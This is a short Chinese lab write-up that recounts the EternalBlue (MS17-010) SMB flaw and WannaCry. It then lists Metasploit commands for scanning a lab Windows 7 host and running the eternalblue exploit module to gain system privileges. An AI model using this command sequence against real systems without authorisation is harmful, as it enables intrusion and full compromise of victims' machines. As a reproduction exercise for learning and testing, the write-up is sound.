永恒之蓝 MS17-010漏洞复现
一:简介
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
二:复现
目标IP:192.168.23.174
这个靶机是我前几个月网上下载的,普通的win7镜像,完全没想到居然也有永恒之蓝漏洞,本来想测试一下有没有,居然真的有
第一步:
打开kali,输入msfconsole 打开msf工具
第二步:search ms17_010 搜索这个漏洞的所有模块
scanner 表示扫描探测,我们可以先探测目标有没有这个漏洞
第三步:利用上面1这个模块
输入 use auxiliary/scanner/smb/smb_ms17_010
设置目标ip: eset RHOSTS 192.168.23.174
开始探测:exploit
表示很有可能有这么漏洞:
第四步:
back 返回上一级
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue //使用攻击模块攻击
average 表示优先推荐使用
设置目标ip,和上面扫描一样
set RHOSTS ip
show options //查看选项
exploit //开始攻击
攻击成功拿到系统权限
注意: 这个实验有时候会导致目标主机的重启。